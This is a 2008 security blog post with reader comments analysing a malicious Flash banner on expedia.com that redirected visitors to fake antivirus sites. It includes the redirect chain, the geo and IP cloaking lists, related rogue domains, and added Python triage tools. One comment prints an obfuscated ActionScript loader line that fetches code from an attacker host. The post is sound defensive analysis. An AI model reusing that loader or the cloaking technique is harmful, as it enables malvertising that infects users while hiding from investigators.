expedia.com hit by malicious banner advertisement?

Expedia.com has been infiltrated by a malicious banner advertisement - a new one that I have not seen before.

Victim site: Expedia.com (216.251.114.10)
SWF host: media.expedia.com
SWF Source:
Target fraudware domain: scanner2.malware-scan.com
Banned cities, countries and IPs:
  IP ranges: 199.3.0.0-199.3.255.255, 216.251.0.0-216.251.255.255, 172.30.0.0-172.30.25.255 (note: expedia.com's IP is banned)
  Countries: IN, IL, UK, AU, FR, IT, CN, JP, DE, ES, MX, AE
  Regions: colorado, washington, california, massachusetts, ontario, texas, hawaii, missouri, illinois
Permitted cities, countries and IPs:
SWF URL: media.expedia.com/ads/FXSound/728x90.swf
Special notes:
Resolution:

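The lockout table above is the reason an analyst sitting inside the victim's own address space, or in one of the listed countries or states, sees nothing but a blank creative. The following is an added example (not code from this post or from the SWF itself) that turns the rules exactly as listed above into network objects and answers "would this vantage point have been served the payload?"; the rule strings are copied from the table, the test addresses 203.0.113.x are constructed, and the leading-zero handling is there because some blacklists are written as "062.193.227.222".

```python
import ipaddress
from typing import Iterable, List, Tuple

# Lockout rules as listed in the table above (constructed from the page, not
# extracted from the SWF by this script). Ranges are "first-last" strings.
BANNED_RANGES = [
    "199.3.0.0-199.3.255.255",
    "216.251.0.0-216.251.255.255",
    "172.30.0.0-172.30.25.255",   # RFC 1918 private space
]
BANNED_COUNTRIES = {"IN", "IL", "UK", "AU", "FR", "IT", "CN", "JP", "DE", "ES", "MX", "AE"}
BANNED_REGIONS = {"colorado", "washington", "california", "massachusetts",
                  "ontario", "texas", "hawaii", "missouri", "illinois"}


def normalize_ip(ip: str) -> str:
    """Drop leading zeros ('062.193.227.222' -> '62.193.227.222'); ipaddress rejects them."""
    return ".".join(str(int(o)) for o in ip.strip().split("."))


def parse_ip_rule(rule: str) -> List[ipaddress.IPv4Network]:
    """Turn 'a.b.c.d-e.f.g.h', 'a.b.c.d/nn' or a bare address into CIDR blocks."""
    rule = rule.strip()
    if "-" in rule:
        first, last = (ipaddress.IPv4Address(normalize_ip(p)) for p in rule.split("-", 1))
        return list(ipaddress.summarize_address_range(first, last))
    if "/" in rule:
        addr, bits = rule.split("/", 1)
        return [ipaddress.IPv4Network(f"{normalize_ip(addr)}/{bits}", strict=False)]
    return [ipaddress.IPv4Network(normalize_ip(rule) + "/32")]


def compile_rules(rules: Iterable[str]) -> List[ipaddress.IPv4Network]:
    nets: List[ipaddress.IPv4Network] = []
    for r in rules:
        nets.extend(parse_ip_rule(r))
    return nets


BANNED_NETS = compile_rules(BANNED_RANGES)


def ip_is_banned(ip: str, nets: List[ipaddress.IPv4Network] = BANNED_NETS) -> bool:
    addr = ipaddress.IPv4Address(normalize_ip(ip))
    return any(addr in n for n in nets)


def payload_would_show(ip: str, country: str, region: str) -> Tuple[bool, str]:
    """Return (shown, reason): what a given vantage point would have been served."""
    if ip_is_banned(ip):
        return False, "ip in banned range"
    if country.upper() in BANNED_COUNTRIES:
        return False, "banned country"
    if region.lower() in BANNED_REGIONS:
        return False, "banned region"
    return True, "not locked out"


if __name__ == "__main__":
    # expedia.com's own address, as the table notes, falls inside 216.251.0.0/16
    print(payload_would_show("216.251.114.10", "US", "washington"))
    # constructed analyst vantage point (TEST-NET-3) outside every rule
    print(payload_would_show("203.0.113.7", "US", "nevada"))
```

The practical reading: to get the capture the author asks for later in the comments, the trace has to come from an address, country and region that all pass `payload_would_show`, otherwise the creative stays blank and the redirect chain never fires.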
Let's have a look at the danger path:

URL and its Referrer, one pair per hop, reading from the fraudware landing page back to the ad on expedia.com:

1. URL: scanner2.malware-scan.com/18_swp/?tmn=null&aid=&lid=&affid=&ax=&ed=&aid=pygmalioni_ma18_mb1t&lid=728&affid=&ax=1&ed=2&mt_info=3958_0_1349
   Referrer: prevedmarketing.com/?tmn=mwatmp&aid=mi1eroof&lid=728&ax=1&ed=2&mt_info=4957_3064_2358
2. URL: prevedmarketing.com//?tmn=mwatmp&aid=pygmalioni&lid=728&ax=1&ed=2&mt_info=5337_4168_2358
   Referrer: blessedads.com/?cmpid=pygmalioni&adid=728
3. URL: quinquecahue.com/statss.php?campaign=pygmalioni&u=1200655836
   Referrer: quinquecahue.com/swf/gnida.swf?campaign=pygmalioni&u=1200655836
4. URL: quinquecahue.com/swf/gnida.swf?campaign=pygmalioni&u=1200655836
   Referrer: quinquecahue.com/statsg.php?u=1200655836&campaign=pygmalioni
5. URL: quinquecahue.com/statsa.php?u=1200655836&campaign=pygmalioni
   Referrer: media.expedia.com/ads/FXSound/728x90.swf
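What ties these hops together is the campaign token, which travels as `campaign=`, `cmpid=` or `aid=` depending on the hop, and the fact that the middle of the chain sits on infrastructure that shows up again in the nameserver pivot further down. Here is an added example (not the author's tooling) that takes the URL/referrer pairs exactly as captured above, orders them from the ad creative to the landing page, pulls the campaign tokens out of the differing query keys, and flags hops whose host is on the known cluster; the `KNOWN_CLUSTER` set is assembled from names on this page and the assumption that captures are scheme-less, so a scheme is prepended before parsing.

```python
from typing import Dict, List, Set
from urllib.parse import parse_qs, urlsplit

# Campaign identifiers travel under different query keys on different hops.
CAMPAIGN_KEYS = ("campaign", "cmpid", "aid")

# Hosts from the nameserver/IP cluster listed on this page plus the one named
# in the comments; used to flag hops on known rogue-AV infrastructure.
KNOWN_CLUSTER = {
    "quinquecahue.com", "akamahi.net", "newbieadguide.com", "vozemiliogaranon.com",
    "advancedcleaner.com", "systemdoctor.com", "spyguardpro.com",
}

# (URL, Referrer) pairs exactly as captured above: landing page first, ad last.
CAPTURED_PAIRS = [
    ("scanner2.malware-scan.com/18_swp/?tmn=null&aid=&lid=&affid=&ax=&ed=&aid=pygmalioni_ma18_mb1t&lid=728&affid=&ax=1&ed=2&mt_info=3958_0_1349",
     "prevedmarketing.com/?tmn=mwatmp&aid=mi1eroof&lid=728&ax=1&ed=2&mt_info=4957_3064_2358"),
    ("prevedmarketing.com//?tmn=mwatmp&aid=pygmalioni&lid=728&ax=1&ed=2&mt_info=5337_4168_2358",
     "blessedads.com/?cmpid=pygmalioni&adid=728"),
    ("quinquecahue.com/statss.php?campaign=pygmalioni&u=1200655836",
     "quinquecahue.com/swf/gnida.swf?campaign=pygmalioni&u=1200655836"),
    ("quinquecahue.com/swf/gnida.swf?campaign=pygmalioni&u=1200655836",
     "quinquecahue.com/statsg.php?u=1200655836&campaign=pygmalioni"),
    ("quinquecahue.com/statsa.php?u=1200655836&campaign=pygmalioni",
     "media.expedia.com/ads/FXSound/728x90.swf"),
]


def _with_scheme(url: str) -> str:
    # Captures on this page are scheme-less; urlsplit needs one to fill netloc.
    return url if "://" in url else "http://" + url


def host_of(url: str) -> str:
    return urlsplit(_with_scheme(url)).hostname or ""


def campaign_tokens(url: str) -> Set[str]:
    """Collect campaign ids under any of the known keys; blank values are ignored."""
    qs = parse_qs(urlsplit(_with_scheme(url)).query)
    tokens: Set[str] = set()
    for key in CAMPAIGN_KEYS:
        for value in qs.get(key, []):
            tokens.add(value.split("_")[0])   # "pygmalioni_ma18_mb1t" -> "pygmalioni"
    return tokens


def build_chain(pairs) -> List[Dict]:
    """Order hops from the ad creative to the landing page and annotate each one."""
    hops = []
    for url, referrer in reversed(pairs):
        host = host_of(url)
        hops.append({
            "url": url,
            "host": host,
            "via": host_of(referrer),
            "campaign": campaign_tokens(url) | campaign_tokens(referrer),
            "known_bad_infra": host in KNOWN_CLUSTER,
        })
    return hops


def summarize(pairs) -> Dict:
    chain = build_chain(pairs)
    return {
        "origin": host_of(pairs[-1][1]),
        "landing": chain[-1]["host"],
        "hosts": [h["host"] for h in chain],
        "all_hosts": {h["host"] for h in chain} | {h["via"] for h in chain},
        "campaign_tokens": set().union(*(h["campaign"] for h in chain)),
        "flagged_hops": [h["host"] for h in chain if h["known_bad_infra"]],
    }


if __name__ == "__main__":
    for key, value in summarize(CAPTURED_PAIRS).items():
        print(f"{key}: {value}")
```

Run on the captured pairs it reports media.expedia.com as the origin, scanner2.malware-scan.com as the landing page, every quinquecahue.com hop flagged, and the token set {pygmalioni, mi1eroof}; the second token comes from the `aid=` value on the last prevedmarketing.com referrer, which is the kind of affiliate handle worth keeping when the same crew reappears under a new domain.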

So, let's take a look at this new name, quinquecahue.com.

Not surprisingly, the malicious domain is hosted by, you guessed it, securehost.com (190.15.64.190):
http://www.robtex.com/dns/quinquecahue.com.html

Who else might we find in that IP range...
http://www.robtex.com/cnet/190.15.64.html

Again, no surprise, we see akamahi.net, newbieadguide.com, vozemiliogaranon.com and a name I have not seen before, familyislands.com.

Check out the domains sharing nameservers with quinquecahue.com - I *know* you're going to recognise many names....

domains sharing nameservers
 
advancedcleaner.com
akamahi.net
antispywaresuite.com
antiviruspcsuite.com
antiworm2008.com
avsystemcare.com
bestsellerantivirus.com
diskretter.com
elmejorantivirus.com
erreurchasseur.com
exterminadordevirus.com
moncontenuassistant.com
schijfbewaker.com
securepccleaner.com
spyguardpro.com
storageprotector.com
systemdoctor.com
thetechnorati.com
toolsicuro.com
vozemiliogaranon.com
winspycontrol.com
yourprivacyguard.com

subdomains
*.quinquecahue.com
ns1.quinquecahue.com
ns2.quinquecahue.com
ns3.quinquecahue.com
ns4.quinquecahue.com
 

Published Mon, Jan 28 2008 21:24 by sandi

Comments

# re: expedia.com hit by malicious banner advertisement?

Wednesday, January 30, 2008 10:49 PM by RBNexploit

This is another run, as in November 07; there are a few more hosts involved in the triangulation, see rbnexploit.blogspot.com/.../rbn-pc-hijacking-via-banner-ads-on.html

# re: expedia.com hit by malicious banner advertisement?

Thursday, January 31, 2008 2:13 AM by David Marsden

I got something similar from http://www.genesreunited.co.uk which attempted to download PerformanceOptimizer.

# re: expedia.com hit by malicious banner advertisement?

Friday, February 01, 2008 9:45 AM by mike wood

Re malicious banner advertisement. I too got hit from GenesReunited.co.uk with PerformanceOptimizer. As a naive computer user, do I need to let GR know about it? And how come their security didn't pick it up??

# re: expedia.com hit by malicious banner advertisement?

Saturday, February 02, 2008 1:47 PM by David Marsden

Hi Mike,

I reported this to GR and they tried to fob me off by advising me that my account seemed to be ok and that I should run an anti-virus program. I replied that I didn't even download the spyware and that I use linux as an operating system, but that plenty of their other users may be at risk and should be aware. I also gave them a link to this site.

GR appears to be down right now...

# re: expedia.com hit by malicious banner advertisement?

Saturday, February 02, 2008 8:52 PM by sandi

Hi guys,

The campaign on genesreunited has been coded to NOT display when the computer being used is in genesreunited's IP range.

I need a Fiddler capture, Ethereal capture or other network trace - that will give me all the proof I need to get this shut down.

Sandi

# re: expedia.com hit by malicious banner advertisement?

Monday, February 04, 2008 9:28 AM by Golan

Hi,

Sorry for the off-topic question, but how can you tell which are the banned IPs/cities/countries?

Thanks!

# re: expedia.com hit by malicious banner advertisement?

Friday, March 28, 2008 9:51 PM by bago

It was a pretty clever attack, where from a neutral country they would contact the ad provider and provide them with highly obfuscated Flash. The Flash would then check the campaign's blacklist so that if you were trying to figure out where these rogue ads came from you got a blank Flash file. Then it would download gnida.swf, which would then download the slowware that they advertised how to remove. The main problem is that Adobe lets you make a function call with an array reference, bypassing CAS.

// member names are passed as strings in brackets, so "_url" and "loadMovie" never appear as plain identifiers
_root["_url"]["substr"](0, 7) == "http://" && this.m1["loadMovie"]("newbieadguide.com/statsa.php" + "&u=somenumbers");

Each campaign had its own blacklist and region lockout.

Here was the IP blacklist:

62.193.227.221
62.193.235.245
62.193.235.46
64.233.183.104
66.102.9.104
66.249.91.104
69.46.17.170
72.14.209.104
72.14.235.104
72.14.253.104
209.85.135.104
062.193.227.222
066.232.118.93
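The two things the comment above describes, member access through string keys instead of plain identifiers and a hard-coded address blacklist inside the creative, are both visible in decompiled ActionScript text and can be triaged without running the SWF. The following is an added example (not the commenter's code nor anything recovered from gnida.swf) that scans a constructed snippet modelled on the line quoted above: it lists every `obj["name"]` access, reassembles `"a" + "b"` string splits so a hidden `loadMovie` shows up, and pulls out embedded IPv4 literals with leading zeros normalised. The snippet, the `blocked()` call and the `SENSITIVE_MEMBERS` list are constructed; the addresses in it are taken from the list above.

```python
import re
from typing import Dict, List, Set

# Members whose indirect (bracket) access in an ad creative is worth a second look.
SENSITIVE_MEMBERS = {"loadMovie", "loadMovieNum", "getURL", "_url", "_root", "substr", "eval"}

# Constructed sample of decompiled ActionScript 2, modelled on the snippet in the
# comment above; blocked() is a hypothetical helper, the IPs come from this page.
SAMPLE_SCRIPT = r'''
var bl = ["62.193.227.221", "62.193.235.245", "062.193.227.222", "066.232.118.93"];
var p = "load" + "Movie";
if (_root["_url"]["substr"](0, 7) == "http://" && !blocked(bl)) {
    this.m1[p]("http://newbieadguide.com/statsa.php" + "?u=1200655836");
}
'''

BRACKET_ACCESS = re.compile(r'''\[\s*(["'])([A-Za-z_]\w*)\1\s*\]''')
IPV4 = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
SPLIT_STRING = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')


def normalize_ip(ip: str) -> str:
    """'062.193.227.222' -> '62.193.227.222' so the list matches firewall logs."""
    return ".".join(str(int(o)) for o in ip.split("."))


def bracket_members(script: str) -> List[str]:
    """Names reached via obj["name"] rather than obj.name, in source order."""
    return [m.group(2) for m in BRACKET_ACCESS.finditer(script)]


def joined_strings(script: str) -> List[str]:
    """Reassemble "a" + "b" concatenations so split keywords become visible."""
    return [m.group(1) + m.group(2) for m in SPLIT_STRING.finditer(script)]


def embedded_ips(script: str) -> Set[str]:
    return {normalize_ip(ip) for ip in IPV4.findall(script)}


def triage(script: str) -> Dict:
    """Static first pass over decompiled ActionScript: what is hidden, and from whom."""
    members = bracket_members(script)
    joined = joined_strings(script)
    ips = embedded_ips(script)
    suspicious = [n for n in members if n in SENSITIVE_MEMBERS]
    suspicious += [s for s in joined if s in SENSITIVE_MEMBERS]
    return {
        "bracket_members": members,
        "joined_strings": joined,
        "suspicious": suspicious,
        "embedded_ips": ips,
        # indirect loader calls plus a baked-in address list is the cloaking pattern
        "verdict": "review" if suspicious and ips else "ok",
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

On the sample this yields `_url`, `substr` and the reassembled `loadMovie` as suspicious members and four normalised addresses, which is enough to send the creative for a proper dynamic capture from an address outside that list; a plain `trace("hello")` script comes back "ok".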